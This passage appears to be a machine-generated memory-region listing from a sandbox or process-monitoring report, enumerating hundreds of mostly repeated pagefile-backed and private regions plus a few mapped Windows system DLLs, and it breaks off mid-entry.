region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21252 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 21253 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21254 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21255 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21256 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21275 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21276 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21277 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21317 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21318 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21322 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21323 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21328 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21340 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 21341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21360 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21361 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21362 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21363 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21364 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21365 start_va = 0x1ea0000 end_va = 0x1ea9fff monitored = 0 entry_point = 0x1ea15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 21366 start_va = 0x2360000 end_va = 0x2360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 21367 start_va = 0x1ea0000 end_va = 0x1ea9fff monitored = 0 entry_point = 0x1ea15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 21368 start_va = 0x2360000 end_va = 0x2360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 21369 start_va = 0x1ea0000 end_va = 0x1ea9fff monitored = 0 entry_point = 0x1ea15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 21370 start_va = 0x2360000 end_va = 0x2360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 21371 start_va = 0x1ea0000 end_va = 0x1ea9fff monitored = 0 entry_point = 0x1ea15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 21372 start_va = 0x2360000 end_va = 0x2360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 21373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21410 start_va = 0x610000 